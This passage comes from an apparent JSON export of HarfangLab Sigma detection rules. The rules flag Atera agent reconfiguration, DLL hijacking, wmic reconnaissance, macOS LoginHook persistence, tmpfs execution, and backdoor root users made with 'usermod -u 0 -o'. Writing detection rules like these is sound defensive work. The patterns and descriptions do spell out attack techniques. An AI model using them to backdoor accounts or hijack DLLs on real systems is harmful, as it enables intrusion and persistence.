"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603727Z",
"creation_date": "2026-03-23T11:45:34.603730Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603738Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/MaxRogers5/status/1572655029018038272",
"https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_suspicious_atera_agent_registry_configuration_change.yml",
"content": "title: Suspicious Atera Agent Registry Configuration Change\nid: 7bcf3a36-198e-4009-b9ca-2d44973c9bda\ndescription: |\n Detects suspicious registry configuration changes of the legitimate remote access tool Atera Agent.\n Attackers can maliciously use Atera Agent by reconfiguring it to point to an attacker-controlled email address, thus providing remote access.\n It is recommended to analyze the changes made to the IntegratorLogin registry key to determine if the email set is linked with a legitimate administrator.\nreferences:\n - https://twitter.com/MaxRogers5/status/1572655029018038272\n - https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/09/26\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.Registry\n - classification.Windows.RMM.Atera\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\ATERA Networks\\AlphaAgent\\IntegratorLogin'\n Details|contains:\n - '@outlook'\n - '@hotmail'\n - '@msn'\n - '@aol'\n - '@yahoo'\n - '@live'\n - '@yandex'\n - '@gmail'\n - '@protonmail'\n - '@mail.ru'\n - '@mailto.plus'\n - '@dropmail'\n - '@firemail.com.br' # https://x.com/johnk3r/status/1854695923537805598\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7bcf3a36-198e-4009-b9ca-2d44973c9bda",
"rule_name": "Suspicious Atera Agent Registry Configuration Change",
"rule_description": "Detects suspicious registry configuration changes of the legitimate remote access tool Atera Agent.\nAttackers can maliciously use Atera Agent by reconfiguring it to point to an attacker-controlled email address, thus providing remote access.\nIt is recommended to analyze the changes made to the IntegratorLogin registry key to determine if the email set is linked with a legitimate administrator.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7bd40b3f-9b14-4f0a-a24f-45c262b3e053",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587688Z",
"creation_date": "2026-03-23T11:45:34.587691Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587699Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tzsync.yml",
"content": "title: DLL Hijacking via tzsync.exe\nid: 7bd40b3f-9b14-4f0a-a24f-45c262b3e053\ndescription: |\n Detects potential Windows DLL Hijacking via tzsync.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tzsync.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7bd40b3f-9b14-4f0a-a24f-45c262b3e053",
"rule_name": "DLL Hijacking via tzsync.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tzsync.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c308e9d-2d15-4d5b-90b5-1ec0b1c8a057",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587491Z",
"creation_date": "2026-03-23T11:45:34.587495Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587502Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_eventcreate.yml",
"content": "title: DLL Hijacking via eventcreate.exe\nid: 7c308e9d-2d15-4d5b-90b5-1ec0b1c8a057\ndescription: |\n Detects potential Windows DLL Hijacking via eventcreate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'eventcreate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c308e9d-2d15-4d5b-90b5-1ec0b1c8a057",
"rule_name": "DLL Hijacking via eventcreate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via eventcreate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c35843a-8300-4ad9-a736-8ba3927a525a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620803Z",
"creation_date": "2026-03-23T11:45:34.620805Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620809Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
"https://attack.mitre.org/techniques/T1047/"
],
"name": "t1047_wmic_discovery.yml",
"content": "title: Generic Discovery via wmic.exe\nid: 7c35843a-8300-4ad9-a736-8ba3927a525a\ndescription: |\n Detects the execution of wmic.exe to dump users, processes, softwares or services.\n Attackers can use this utility to perform various types of reconnaissance.\n It is recommended to analyze the process responsible for the execution of wmic.exe to look for malicious content or other malicious actions.\nreferences:\n - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\n - https://attack.mitre.org/techniques/T1047/\ndate: 2022/11/07\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1047\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n\n selection_susp_arguments:\n CommandLine|contains|all:\n - ' get '\n - ' Fullname'\n - ' PasswordAge'\n - ' NumberOfLogons'\n - ' Profile'\n\n selection_get_command:\n CommandLine|contains: ' get'\n\n selection_list_command:\n CommandLine|contains: ' list'\n\n selection_get_field:\n CommandLine|contains:\n - ' useraccount'\n - ' service '\n - ' product '\n\n selection_list_field:\n CommandLine|contains:\n - ' useraccount'\n - ' service '\n - ' product '\n - ' process'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_commandline:\n CommandLine|contains:\n - 'wmic.exe baseboard get '\n - 'wmic baseboard get '\n - 'service where name like ?tacticalrmm? get Name '\n - ' product where name like ?Microsoft Office Standard 2%? 
get name'\n\n exclusion_carestream:\n CommandLine: 'wmic service where name=Smart Link Gateway get StartName'\n ParentImage: '?:\\Program Files (x86)\\Carestream\\Smart Link Agent\\RMSPerl\\perl\\bin\\perl.exe'\n\n exclusion_atempo:\n ParentImage|startswith: '?:\\Program Files\\Atempo\\'\n\n exclusion_easily:\n CommandLine: 'wmic service where ?name=easily.socle.exploitation.agent? get name, startmode, state /format:csv'\n\n exclusion_legitimate_tools:\n - GrandparentCommandLine|contains:\n - '?:\\Program Files\\OCS Inventory Agent\\plugins\\CustomWinSoftware.ps1'\n - '\\Nutanix\\Move\\download\\scripts\\UninstallVMwareTools.ps1'\n - GrandparentImage:\n - '?:\\Program Files (x86)\\Carte Services PLUS 3\\Carte Services PLUS 3.exe'\n - '?:\\Program Files\\Carte Services PLUS 3\\Carte Services PLUS 3.exe'\n - '?:\\Program Files\\Microsoft Cloud Managed Desktop Extension\\CMDExtension\\Microsoft.Management.Services.CloudManagedDesktop.Agent.exe'\n - '?:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Carte Services PLUS 3\\Carte Services PLUS 3.exe'\n - '?:\\Program Files\\Centreon NSClient++\\Uninst.exe'\n - '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCD.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\ToolsIQ.exe'\n\n exclusion_palo_alto:\n - ParentImage:\n - '?:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGPA.exe'\n - '?:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGPSupport.exe'\n - GrandparentImage:\n - '?:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGPA.exe'\n - '?:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGPSupport.exe'\n\n exclusion_myhop:\n CommandLine: \"WMIC SERVICE WHERE 'Name=myhop.Socle.Exploitation.Agent' GET NAME, STARTMODE, State /FORMAT:csv\"\n\n exclusion_salt:\n GrandparentImage: '?:\\VMware\\UCP\\salt\\bin\\python.exe'\n\n exclusion_telemis:\n ParentImage: '?:\\telemis\\nemo\\localProbe\\Python*\\python.exe'\n CommandLine: 'wmic 
product get name'\n\n condition: selection_bin and (selection_susp_arguments or (all of selection_get_*) or (all of selection_list_*)) and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c35843a-8300-4ad9-a736-8ba3927a525a",
"rule_name": "Generic Discovery via wmic.exe",
"rule_description": "Detects the execution of wmic.exe to dump users, processes, softwares or services.\nAttackers can use this utility to perform various types of reconnaissance.\nIt is recommended to analyze the process responsible for the execution of wmic.exe to look for malicious content or other malicious actions.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c489058-8e36-42b2-97cf-d19aad77fe92",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092723Z",
"creation_date": "2026-03-23T11:45:34.092725Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092729Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md",
"https://attack.mitre.org/techniques/T1037/002/",
"https://attack.mitre.org/techniques/T1547/007/"
],
"name": "t1037_002_login_script.yml",
"content": "title: New Login Script Added\nid: 7c489058-8e36-42b2-97cf-d19aad77fe92\ndescription: |\n Detects the addition of a new login script on macOS via defaults com.apple.loginwindow.LoginHook.\n Attackers may use a Login Hook to establish persistence by pointing it to a malicious script.\n A Login Hook is a LoginHook key in the com.apple.loginwindow.plist preference file stored in /Library/Preferences/; it points to a script that is executed with root privileges upon user logon and can be set using the defaults command-line utility.\n It is recommended to investigate the script referenced by the newly written LoginHook value to determine if it is malicious.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md\n - https://attack.mitre.org/techniques/T1037/002/\n - https://attack.mitre.org/techniques/T1547/007/\ndate: 2022/07/21\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1037.002\n - attack.t1547.007\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/defaults'\n CommandLine|contains|all:\n - 'write'\n - 'com.apple.loginwindow'\n - 'LoginHook'\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c489058-8e36-42b2-97cf-d19aad77fe92",
"rule_name": "New Login Script Added",
"rule_description": "Detects the addition of a new login script on macOS via defaults com.apple.loginwindow.LoginHook.\nAttackers may use a Login Hook to establish persistence by pointing it to a malicious script.\nA Login Hook is a LoginHook key in the com.apple.loginwindow.plist preference file stored in /Library/Preferences/; it points to a script that is executed with root privileges upon user logon and can be set using the defaults command-line utility.\nIt is recommended to investigate the script referenced by the newly written LoginHook value to determine if it is malicious.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1037.002",
"attack.t1547.007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c4f005e-0848-49fc-b9fb-72ccd0cc4fb6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624908Z",
"creation_date": "2026-03-23T11:45:34.624910Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624914Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_tmpfs_file_execution.yml",
"content": "title: Execution from a Shared Memory Path\nid: 7c4f005e-0848-49fc-b9fb-72ccd0cc4fb6\ndescription: |\n Detects a suspicious execution from a shared memory path.\n This is used to avoid dropping a malicious file on disk (fileless malware technique).\n This technique is used to bypass security products that use \"scan on write\" detection.\n As the file is never written to disk, it will never trigger the “scan on write” feature.\n It is recommended to check the legitimacy and origin of the process triggering this rule.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2021/10/11\nmodified: 2025/12/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.t1564.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.MemoryExecution\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|startswith:\n - '/dev/shm/'\n - '/var/run'\n - '/run/'\n\n exclusion_steam:\n - CommandLine:\n - '/sbin/ldconfig.real -f /run/pressure-vessel/ldso/ld.so.conf -C /run/pressure-vessel/ldso/new-ld.so.cache -X'\n - '/sbin/ldconfig.real -f /var/pressure-vessel/ldso/ld.so.conf -C /var/pressure-vessel/ldso/new-ld.so.cache -X'\n - '/sbin/ldconfig.real -XNv'\n - '/sbin/ldconfig -f /run/user/*/pressure-vessel/ldso/ld.so.conf -C /run/user/*/pressure-vessel/ldso/new-ld.so.cache -X'\n - '/sbin/ldconfig.real -p'\n ParentImage:\n - '/usr/lib/pressure-vessel/from-host/bin/pressure-vessel-adverb'\n - '/usr/lib/pressure-vessel/from-host/libexec/steam-runtime-tools-?/pv-adverb'\n - '*/steam-runtime/amd64/usr/bin/steam-runtime-identify-library-abi'\n - '/usr/bin/bash'\n - Image: '/run/host/usr/bin/localedef'\n\n exclusion_supervise:\n Image: '/run/s6/services/nginx/finish'\n ParentImage: '/bin/s6-supervise'\n\n exclusion_schroot:\n Image: 
'/run/schroot/mount/*'\n ParentImage: '/usr/bin/schroot'\n\n exclusion_podman:\n Image: '/run/podman-init'\n\n exclusion_go:\n Image: '/run/user/*/go-build*/*'\n ParentImage: '/usr/lib/go/bin/go'\n\n exclusion_container:\n - ParentImage: '/usr/local/bin/containerd-shim-runc-v2'\n - GrandparentImage: '/usr/local/bin/containerd-shim-runc-v2'\n - Ancestors|contains: '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_perl:\n Image|startswith: '/dev/shm/perl_build/perl-*/'\n\n exclusion_mysql:\n Image|startswith: '/dev/shm/perl_build/DBD-mysql-*/'\n\n exclusion_vessel:\n CommandLine|contains: '/var/pressure-vessel/ldso/'\n\n exclusion_grid:\n CommandLine|contains: '/NonLinLoc/src/bin/Grid2'\n\n exclusion_incus_agent:\n ParentImage: '/usr/lib/systemd/systemd'\n Image: '/run/incus_agent/incus-agent'\n\n exclusion_appimage:\n Image: '/run/user/*/appimagelauncherfs/*.AppImage'\n\n exclusion_argo:\n Image: '/var/run/argo/argoexec'\n\n exclusion_dia:\n Image: '/run/user/*/usr/bin/dia'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c4f005e-0848-49fc-b9fb-72ccd0cc4fb6",
"rule_name": "Execution from a Shared Memory Path",
"rule_description": "Detects the execution of a binary located under a memory-backed (tmpfs) path such as /dev/shm or /run.\nThis is used to avoid dropping a malicious file on disk (fileless malware technique).\nThis technique is used to bypass security products that rely on \"scan on write\" detection.\nAs the file is never written to persistent storage, it will never trigger the \"scan on write\" feature.\nIt is recommended to check the legitimacy and origin of the process triggering this rule.\n",
"rule_creation_date": "2021-10-11",
"rule_modified_date": "2025-12-10",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c61f922-cea4-4ba4-af16-18a8abc4c6f2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071357Z",
"creation_date": "2026-03-23T11:45:34.071359Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071363Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://embracethered.com/blog/posts/2021/linux-user-uid-zero-backdoor/",
"https://attack.mitre.org/techniques/T1548/"
],
"name": "t1548_potential_backdoor_user_creation.yml",
"content": "title: Potential Backdoor User Creation\nid: 7c61f922-cea4-4ba4-af16-18a8abc4c6f2\ndescription: |\n Detects the creation of a backdoor user by modifying an existing user's UID to 0 (root) using the usermod command.\n Threat actors can use this technique to create privileged accounts that persist with root access while appearing as regular users.\n It is recommended to investigate the execution context of this command to determine its legitimacy.\nreferences:\n - https://embracethered.com/blog/posts/2021/linux-user-uid-zero-backdoor/\n - https://attack.mitre.org/techniques/T1548/\ndate: 2024/12/02\nmodified: 2025/11/24\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1548\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - 'usermod -u 0 -o'\n - 'usermod -o -u 0'\n\n exclusion_s6:\n GrandparentImage: '/package/admin/s6-*/command/s6-sudod'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c61f922-cea4-4ba4-af16-18a8abc4c6f2",
"rule_name": "Potential Backdoor User Creation",
"rule_description": "Detects the modification of an existing user's UID to 0 (root) using the usermod command (-u 0 combined with -o), which turns that account into a backdoor root user.\nThreat actors can use this technique to create privileged accounts that persist with root access while appearing as regular users.\nNote that only the short-flag forms 'usermod -u 0 -o' and 'usermod -o -u 0' are matched; long options or direct edits of /etc/passwd are not covered by this rule.\nIt is recommended to investigate the execution context of this command to determine its legitimacy.\n",
"rule_creation_date": "2024-12-02",
"rule_modified_date": "2025-11-24",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
